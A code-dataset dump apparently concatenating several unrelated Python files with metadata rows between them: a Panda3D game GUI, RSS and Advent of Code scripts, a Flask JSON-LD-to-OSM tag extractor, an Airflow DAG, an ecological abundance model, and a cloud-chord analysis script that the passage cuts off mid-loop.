cancelframe_hpr=LVecBase3f(0, 0, 0),
cancelframe_pos=LPoint3f(0, 0, 0),
cancelframe_relief=None,
item_frameSize=(0.07500000298023224, 2.4125001430511475, -0.11250001192092896, 0.75),
item_hpr=LVecBase3f(0, 0, 0),
item_pos=LPoint3f(-0.075, 0, -0.75),
item_text='item1',
item0_text_align=TextNode.A_left,
item0_text_scale=(1, 1),
item0_text_pos=(0, 0),
item0_text_fg=LVecBase4f(0, 0, 0, 1),
item0_text_bg=LVecBase4f(0, 0, 0, 0),
item0_text_wordwrap=None,
popupMarker_frameSize=(-0.5, 0.5, -0.2, 0.2),
popupMarker_hpr=LVecBase3f(0, 0, 0),
popupMarker_pos=LPoint3f(2.7125, 0, 0.31875),
popupMarker_relief=2,
popupMarker_scale=LVecBase3f(0.4, 0.4, 0.4),
popupMenu_frameSize=(0, 2.3375001400709152, -0.862500011920929, 0),
popupMenu_hpr=LVecBase3f(0, 0, 0),
popupMenu_pos=LPoint3f(0, 0, 0),
popupMenu_relief='raised',
text_align=TextNode.A_left,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.optionPlayerClass.setTransparency(0)
self.btnCancel = DirectButton(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.325, 0, -0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Cancel',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
command=base.messenger.send,
extraArgs=["multiplayerPlayerInfo_cancel"],
)
self.btnCancel.setTransparency(0)
self.frmPlayerInfo = DirectFrame(
borderWidth=(0.01, 0.01),
frameColor=(1, 1, 1, 1),
frameSize=(-0.5, 0.5, -0.55, 0.55),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.765, 0, 0),
relief=3,
parent=self.frmMain,
)
self.frmPlayerInfo.setTransparency(0)
self.lblInfoHeader = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0, 0, 0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Info',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblInfoHeader.setTransparency(0)
self.frmImageHero = DirectFrame(
frameColor=(1, 1, 1, 1),
frameSize=(-0.15, 0.15, -0.2, 0.2),
hpr=LVecBase3f(0, 0, 0),
image='/home/fireclaw/workspace/Ankandora/AnkandoraLight/design/guiGraphics/heroArcher.png',
pos=LPoint3f(-0.275, 0, 0.195),
image_scale=LVecBase3f(0.15, 1, 0.2),
image_pos=LPoint3f(0, 0, 0),
parent=self.frmPlayerInfo,
)
self.frmImageHero.setTransparency(1)
self.lblClassDescription = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.12, 0, 0.31),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='The archer shoots from afar and gains the first-strike',
text_align=TextNode.A_left,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=10.0,
parent=self.frmPlayerInfo,
)
self.lblClassDescription.setTransparency(0)
self.lblHealth = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.28, 0, -0.1),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Health',
text_align=TextNode.A_center,
text_scale=(0.7, 0.7),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblHealth.setTransparency(0)
self.lblAttack = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.285),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Attack',
text_align=TextNode.A_center,
text_scale=(0.7, 0.7),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblAttack.setTransparency(0)
self.lblHealthValue = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.17),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='7',
text_align=TextNode.A_center,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblHealthValue.setTransparency(0)
self.lblAttackValue = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.36),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='4',
text_align=TextNode.A_center,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblAttackValue.setTransparency(0)
def show(self):
self.frmMain.show()
def hide(self):
self.frmMain.hide()
def destroy(self):
self.frmMain.destroy()
| 35.126354
| 104
| 0.528777
| 1,198
| 9,730
| 4.196995
| 0.128548
| 0.057279
| 0.036993
| 0.062053
| 0.589897
| 0.554694
| 0.539578
| 0.50358
| 0.498011
| 0.442323
| 0
| 0.133963
| 0.336382
| 9,730
| 276
| 105
| 35.253623
| 0.644727
| 0.009147
| 0
| 0.484
| 0
| 0
| 0.030193
| 0.017016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016
| false
| 0
| 0.024
| 0
| 0.044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c7e9662e071c24633307f69bc18856ffa49ecf
| 634
|
py
|
Python
|
publications/time_mag.py
|
mkoo21/rss-review-scraper
|
4adde8586ce55d7bb211bcfbb9bcccd1edc8b6a5
|
[
"BSD-3-Clause"
] | null | null | null |
publications/time_mag.py
|
mkoo21/rss-review-scraper
|
4adde8586ce55d7bb211bcfbb9bcccd1edc8b6a5
|
[
"BSD-3-Clause"
] | 1
|
2021-06-01T23:47:57.000Z
|
2021-06-01T23:47:57.000Z
|
publications/time_mag.py
|
mkoo21/rss-review-scraper
|
4adde8586ce55d7bb211bcfbb9bcccd1edc8b6a5
|
[
"BSD-3-Clause"
] | null | null | null |
from . import FROM_FEED_PUBLISHED_TODAY, STRINGIFY
def filter_by_tag(tag, entries):
matches = list(filter(
lambda x: any(list(map(
lambda y: y.term == tag,
x.tags
))),
entries
))
if len(matches) == 0:
return ""
return "<h2>TIME {} - {} results</h2>".format(tag, len(matches)) + \
"".join(list(map(lambda x: STRINGIFY(x, 'TIME'), matches)))
def TIME():
pub_today = FROM_FEED_PUBLISHED_TODAY('https://feeds2.feedburner.com/time/entertainment')
return filter_by_tag('movies', pub_today) + \
filter_by_tag('Television', pub_today)
| 28.818182
| 93
| 0.594637
| 79
| 634
| 4.582278
| 0.468354
| 0.066298
| 0.09116
| 0.121547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008475
| 0.255521
| 634
| 21
| 94
| 30.190476
| 0.758475
| 0
| 0
| 0
| 0
| 0
| 0.152997
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.058824
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c8ad01f8962aad9216b71e8846b60294d68306
| 3,017
|
py
|
Python
|
2020/21/code.py
|
irobin591/advent-of-code-2019
|
279c28a2863558bd014b289802fff4b444c5d6cf
|
[
"MIT"
] | null | null | null |
2020/21/code.py
|
irobin591/advent-of-code-2019
|
279c28a2863558bd014b289802fff4b444c5d6cf
|
[
"MIT"
] | null | null | null |
2020/21/code.py
|
irobin591/advent-of-code-2019
|
279c28a2863558bd014b289802fff4b444c5d6cf
|
[
"MIT"
] | null | null | null |
# Advent of Code 2020
# Day 21
# Author: irobin591
import os
import doctest
import re
re_entry = re.compile(r'^([a-z ]+) \(contains ([a-z, ]*)\)$')
with open(os.path.join(os.path.dirname(__file__), "input.txt"), 'r') as input_file:
input_data = input_file.read().strip().split('\n')
def part1(input_data):
"""
>>> part1(open(os.path.join(os.path.dirname(__file__), "test_part1.txt"), 'r').read().strip().split('\\n'))
5
"""
# dict['allergen'] = ['asdfa', 'agbsfb']
allergens = {}
ingredients = []
# map strings to allergens
for entry in input_data:
r = re_entry.match(entry)
if not r:
raise RuntimeError("")
contents = set(r.group(1).split(' '))
ingredients.extend(contents)
for allergen in r.group(2).split(', '):
if allergen not in allergens:
allergens[allergen] = contents
else:
# only keep already added ingredients
allergens[allergen] = [ingredient for ingredient in contents if ingredient in allergens[allergen]]
# print(allergens)
# print(ingredients)
ingredients_with_allergens = set([y for x in allergens.values() for y in x])
# print(list(filter(lambda i: i not in ingredients_with_allergens, ingredients)))
return len(list(filter(lambda i: i not in ingredients_with_allergens, ingredients)))
def part2(input_data):
"""
>>> part2(open(os.path.join(os.path.dirname(__file__), "test_part1.txt"), 'r').read().strip().split('\\n'))
'mxmxvkd,sqjhc,fvjkl'
"""
# dict['allergen'] = ['asdfa', 'agbsfb']
allergens = {}
ingredients = []
# map strings to allergens
for entry in input_data:
r = re_entry.match(entry)
if not r:
raise RuntimeError("")
contents = set(r.group(1).split(' '))
ingredients.extend(contents)
for allergen in r.group(2).split(', '):
if allergen not in allergens:
allergens[allergen] = list(contents)
else:
# only keep already added ingredients
allergens[allergen] = [ingredient for ingredient in contents if ingredient in allergens[allergen]]
# print(allergens)
# (allergen, ingredient)
assigned_allergens = []
while sum([len(ingreds) for ingreds in allergens.values()]) > 0:
for allergen in allergens:
if len(allergens[allergen]) == 1:
ingredient = allergens[allergen][0]
assigned_allergens.append((allergen, ingredient))
for allergen2 in allergens:
if ingredient in allergens[allergen2]:
allergens[allergen2].remove(ingredient)
assigned_allergens.sort(key=lambda x: x[0])
return ",".join([x[1] for x in assigned_allergens])
if __name__ == "__main__":
doctest.testmod()
print("Part One: {}".format(part1(input_data)))
print("Part Two: {}".format(part2(input_data)))
pass
| 30.785714
| 114
| 0.599271
| 355
| 3,017
| 4.969014
| 0.270423
| 0.056122
| 0.017007
| 0.02381
| 0.576531
| 0.576531
| 0.576531
| 0.576531
| 0.558957
| 0.558957
| 0
| 0.013483
| 0.262512
| 3,017
| 98
| 115
| 30.785714
| 0.779326
| 0.2118
| 0
| 0.461538
| 0
| 0
| 0.036989
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0.019231
| 0.057692
| 0
| 0.134615
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5cb7cb45edf1a90b51258da74fc6a1d2b6758fa
| 2,761
|
py
|
Python
|
app.py
|
iandees/microdata2osm
|
1505b8072880055033ddbb85626fcdb857c97d4e
|
[
"MIT"
] | 1
|
2019-11-05T16:02:17.000Z
|
2019-11-05T16:02:17.000Z
|
app.py
|
iandees/microdata2osm
|
1505b8072880055033ddbb85626fcdb857c97d4e
|
[
"MIT"
] | null | null | null |
app.py
|
iandees/microdata2osm
|
1505b8072880055033ddbb85626fcdb857c97d4e
|
[
"MIT"
] | null | null | null |
from flask import Flask, jsonify, request
from w3lib.html import get_base_url
import extruct
import requests
app = Flask(__name__)
def extract_osm_tags(data):
tags = {}
schema_org_type = data.get('@type')
if schema_org_type == 'Restaurant':
tags['amenity'] = 'restaurant'
serves_cuisine = tags.get('servesCuisine')
if serves_cuisine:
cuisine = []
if 'Burgers' in serves_cuisine:
cuisine.append('burger')
if 'Fast Casual' in serves_cuisine:
tags['amenity'] = 'fast_food'
elif schema_org_type == 'Hotel':
tags['tourism'] = 'hotel'
elif schema_org_type == 'ExerciseGym':
tags['leisure'] = 'fitness_centre'
elif schema_org_type == 'BankOrCreditUnion':
tags['amenity'] = 'bank'
else:
return {}
address = data.get('address', {}).get('streetAddress')
if address:
tags['addr:full'] = address
address = data.get('address', {}).get('addressLocality')
if address:
tags['addr:city'] = address
address = data.get('address', {}).get('addressRegion')
if address:
tags['addr:state'] = address
address = data.get('address', {}).get('postalCode')
if address:
tags['postcode'] = address
address = data.get('address', {}).get('addressCountry')
if address:
tags['addr:country'] = address
brand = data.get('brand')
if brand:
tags['brand'] = brand
name = data.get('name')
if name:
tags['name'] = name
telephone = data.get('telephone')
if telephone:
tags['phone'] = telephone
faxNumber = data.get('faxNumber')
if faxNumber:
tags['fax'] = faxNumber
url = data.get('url')
if url:
tags['website'] = url
return tags
@app.route("/extract")
def extract():
url = request.args.get('url')
if not url:
return jsonify(error="Must specify url parameter"), 400
app.logger.info("Extracting json-ld from %s", url)
r = requests.get(url)
if r.status_code != 200:
app.logger.info("HTTP %s from %s", r.status_code, url)
return jsonify(error="Error fetching url"), 502
base_url = get_base_url(r.text, r.url)
data = extruct.extract(r.text, base_url=base_url, syntaxes=["json-ld"])
data = data.get('json-ld')
output = {}
suggested_tags = {}
for entry in data:
suggested_tags.update(extract_osm_tags(entry))
output = {
'status': {
'url': url,
'success': len(suggested_tags) > 0,
},
'suggested_tags': suggested_tags,
}
if request.args.get('include_extracted', type=bool):
output['extracted'] = data
return jsonify(output)
| 25.803738
| 75
| 0.589279
| 324
| 2,761
| 4.901235
| 0.302469
| 0.052897
| 0.040932
| 0.066121
| 0.093199
| 0.078086
| 0
| 0
| 0
| 0
| 0
| 0.005429
| 0.266208
| 2,761
| 106
| 76
| 26.04717
| 0.778381
| 0
| 0
| 0.060241
| 0
| 0
| 0.191959
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024096
| false
| 0
| 0.048193
| 0
| 0.13253
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5cdc3a0f5e46ad0ab740a282e0265f0e1bb27d5
| 702
|
py
|
Python
|
dags/simple_python_taskflow_api.py
|
davemasino/airflow101
|
f940e169b9c562e3834a201827b615744a99b86d
|
[
"Apache-2.0"
] | null | null | null |
dags/simple_python_taskflow_api.py
|
davemasino/airflow101
|
f940e169b9c562e3834a201827b615744a99b86d
|
[
"Apache-2.0"
] | null | null | null |
dags/simple_python_taskflow_api.py
|
davemasino/airflow101
|
f940e169b9c562e3834a201827b615744a99b86d
|
[
"Apache-2.0"
] | null | null | null |
"""
A simple Python DAG using the Taskflow API.
"""
import logging
import time
from datetime import datetime
from airflow import DAG
from airflow.decorators import task
log = logging.getLogger(__name__)
with DAG(
dag_id='simple_python_taskflow_api',
schedule_interval=None,
start_date=datetime(2021, 1, 1),
catchup=False,
tags=['airflow101'],
) as dag:
@task(task_id="hello_message")
def say_hello():
"""Print a hello message"""
print("Hello, World!")
hello_task = say_hello()
@task(task_id="go_to_sleep")
def sleep_for_1():
"""Go to sleep"""
time.sleep(1)
sleeping_task = sleep_for_1()
hello_task >> sleeping_task
| 20.057143
| 43
| 0.665242
| 96
| 702
| 4.604167
| 0.458333
| 0.061086
| 0.045249
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021858
| 0.217949
| 702
| 34
| 44
| 20.647059
| 0.783242
| 0.109687
| 0
| 0
| 0
| 0
| 0.120264
| 0.042834
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.227273
| 0
| 0.318182
| 0.045455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5cdc4a618ee4e3bc14a1bf765626931e9530f36
| 1,744
|
py
|
Python
|
pyunmarked/roylenichols.py
|
kenkellner/pyunmarked
|
485bd96b4ca12a019b478fc19f68f577279ac9b8
|
[
"MIT"
] | null | null | null |
pyunmarked/roylenichols.py
|
kenkellner/pyunmarked
|
485bd96b4ca12a019b478fc19f68f577279ac9b8
|
[
"MIT"
] | null | null | null |
pyunmarked/roylenichols.py
|
kenkellner/pyunmarked
|
485bd96b4ca12a019b478fc19f68f577279ac9b8
|
[
"MIT"
] | null | null | null |
from . import model
import numpy as np
from scipy import special, stats
class RoyleNicholsModel(model.UnmarkedModel):
def __init__(self, det_formula, abun_formula, data):
self.response = model.Response(data.y)
abun = model.Submodel("Abundance", "abun", abun_formula, np.exp, data.site_covs)
det = model.Submodel("Detection", "det", det_formula, special.expit, data.obs_covs)
self.submodels = model.SubmodelDict(abun=abun, det=det)
def negloglik(self, x, mod, K):
x = np.array(x)
beta_abun = x[mod["abun"].index]
beta_det = x[mod["det"].index]
y = mod.response.y
N, J = y.shape
lam = mod["abun"].predict(beta=beta_abun, interval=False)
r = mod["det"].predict(beta=beta_det, interval=False).reshape(N, J)
q = 1 - r
nll = 0.0
for i in range(N):
kvals = range(int(mod.response.Kmin[i]), int(K)+1)
f = stats.poisson.pmf(kvals, lam[i])
ymat = np.tile(y[i,], (len(kvals), 1))
qmat = np.tile(q[i,], (len(kvals), 1))
kmat = np.tile(kvals, (J, 1)).transpose()
pmat = 1 - qmat**kmat
g = stats.binom.logpmf(ymat, 1, pmat).sum(axis=1)
fg = f * np.exp(g)
nll -= np.log(fg.sum())
return nll
def simulate(self):
N, J = self.response.y.shape
lam = self.predict("abun", interval=False)
q = 1 - self.predict("det", interval=False).reshape(N, J)
z = np.random.poisson(lam, N)
zrep = np.tile(z, (J,1)).transpose()
p = 1 - q**zrep
y = np.empty((N, J))
for i in range(N):
y[i,] = np.random.binomial(1, p[i,], J)
return y
| 37.913043
| 91
| 0.544151
| 253
| 1,744
| 3.695652
| 0.328063
| 0.010695
| 0.019251
| 0.049198
| 0.079144
| 0.053476
| 0
| 0
| 0
| 0
| 0
| 0.01141
| 0.296445
| 1,744
| 45
| 92
| 38.755556
| 0.750611
| 0
| 0
| 0.04878
| 0
| 0
| 0.026376
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.073171
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5cdf640db99a0e2d2dcf804807be669d9939f1e
| 75,933
|
py
|
Python
|
proc_chords_xarray.py
|
pgriewank/ASR_tools
|
306a7d92725888485a35f8824433ad7b0451b569
|
[
"MIT"
] | null | null | null |
proc_chords_xarray.py
|
pgriewank/ASR_tools
|
306a7d92725888485a35f8824433ad7b0451b569
|
[
"MIT"
] | null | null | null |
proc_chords_xarray.py
|
pgriewank/ASR_tools
|
306a7d92725888485a35f8824433ad7b0451b569
|
[
"MIT"
] | null | null | null |
#Contains the functions needed to process both chords and regularized beards
# proc_chords is used for chords
#proc_beard_regularize for generating beards
#proc_pdf saves pdfs of a variable below cloud base
#Both have a large overlap, but I split them in two to keep the one script from getting to confusing.
import numpy as np
import math
from netCDF4 import Dataset
import os
import time as ttiimmee
from scipy.interpolate import interp1d
from scipy.interpolate import interp2d
#from scipy.interpolate import griddata
#from mpl_toolkits.axes_grid1 import make_axes_locatable
import pickle
import sys
#sys.path.insert(0, "/home/pgriewank/code/2019-chords-plumes/")
#from unionfind import UnionFind
from cusize_functions import *
#import matplotlib.pyplot as plt
import pandas as pd
import gc
import glob
import xarray as xr
#turned into a function
#removed the possibility to loop over multiple dates, if you want to do that call the function repeatedly
#Full list of variables to analyze is unclear, I will try to include everything available, but this might break the memory bank
#want to keep the automatic x and y calculation
#Scaling shouldn't be needed, as all chord properties should be indepenent of wind direction (right?)
#Similarly, no basedefinition is needed, all values are relative to cloud base
#Should be able to work for any variable in the column output, or for any 3D variable as long as it is named the same as the file.
#Changing 3D output
#Default is now to always go over x and y directions
#TODO
#plot_flag disabled for the mean time
def proc_chords( date_str='20160611',
directory_input='/data/testbed/lasso/sims/',
directory_output='/data/testbed/lasso/chords/',
data_dim_flag=1,
base_percentile = 25,
special_name='',
chord_times = 0,
N_it_min=0,
N_it_max=1e9):
# plot_curtains_flag: 0 nothing, 1 plots pre regularization plots, currently dissabled
# data_dim_flag: 1 = column, 3 = 3D snapshot
# chord_times: 0 use Neils values, use values that fit model output exactly with not gap possible
# directory_input = '/data/testbed/lasso/sims/' #+date
# N_it_max = maximum number of iterables, 3D timesteps or column files. Used for testing things quickly
# N_it_min = start number of iterables, 3D timesteps or column files. Only reall makes sense for 3D to avoid some weird initial fields.
time_begin = ttiimmee.time()
dz = 25.0 #39.0625 #should be overwritten after the profile data is loaded
dx = 25.0
date = date_str
n_percentiles = 7 #Number of percentiles
percentiles = np.array([5,10,35,50,65,90,95])
#1D clustering parameters in seconds, taken to agree with Lareau
if chord_times == 0:
t_gap = 20
t_min = 30
t_max = 1200*100 #Made a 100 times longer
cell_min = 3 #Minimal number of cells needed per chord
# #1D clustering parameters,
#set super strict, but goes on for a loooong time as well
if chord_times == 1:
t_gap = 0. #should be pretty strict, no gaps allowed!
t_min = 0.0
t_max = 1e9
cell_min = 3 #Minimal number of cells needed per chord
ql_min = 1e-5 #value used to determine existence of cloud
z_min = 10 #Index of minimum z_vlvl of the cbl
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*column*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
filename_qt = directory_input+date+'/qt.nc'
filename_thl = directory_input+date+'/thl.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
file_thl = Dataset(filename_thl,read='r')
file_qt = Dataset(filename_qt,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
filename_prof=glob.glob(directory_input+date+'/*default?0*.nc')[0]
#if date=='bomex':
# filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
n_chords = 0
#I will try lists first, which I will then convert to arrays in the end before saving in pandas
chord_timesteps = []
chord_length = []
chord_duration = []
chord_time = []
chord_height = [] #percentile of cloud base
chord_w = []
chord_w_up = [] #mean over updrafts
chord_w_base = []
chord_w_star = []
chord_thl_star = []
chord_qt_star = []
chord_thl = []
chord_thl_25 = []
chord_thl_75 = []
chord_qt = []
chord_qt_25 = []
chord_qt_75 = []
chord_w_flux = [] #Sum of w below
#Coming next
chord_w_per = np.zeros([0,n_percentiles])
chord_w_per_up = np.zeros([0,n_percentiles])
#This now a bit trickier then for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
#Then latter apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
thl_prof = file_prof['thl'][:,:]
qt_prof = file_prof['qt'][:,:]
nz_prof = w2.shape[1]
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
print('dz: ',dz)
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Mimimum of LCL +100 or variance plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height heigher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
print('n_chords: ',n_chords)
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
print('t_1d',t_1d)
thl_2d = file_col.variables['thl'][:]
thl_2d = thl_2d.transpose()
qt_2d = file_col.variables['qt'][:]
qt_2d = qt_2d.transpose()
u_2d = file_col.variables['u'][:]
u_2d = u_2d.transpose()
v_2d = file_col.variables['v'][:]
v_2d = v_2d.transpose()
#lets try saving memory by closing files
#file_col.close()
#The needed cbl height
cbl_1d = t_1d*0
#The needed surface_bouyancy_flux
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d = t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies of thl and qt we subtract the closet mean profile
for tt in range(len(time_prof)):
#globals().update(locals())
tmp_matrix = thl_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = thl_prof[tt,:]
#because the vectors don't perfectly align
thl_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
tmp_matrix = qt_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = qt_prof[tt,:]
#because the vectors don't perfectly align
qt_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
qt_3d = grab_3d_field(file_qt ,it,'qt')
thl_3d = grab_3d_field(file_thl ,it,'thl')
#Here we have to do all the fuckery to turn the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
qt_2d = np.array(qt_3d.reshape((nz,nx*ny)))
thl_2d = np.array(thl_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field, use to be an either or, now just add it on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
qt_3d = np.transpose(qt_3d, (0, 2, 1))
thl_3d = np.transpose(thl_3d, (0, 2, 1))
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
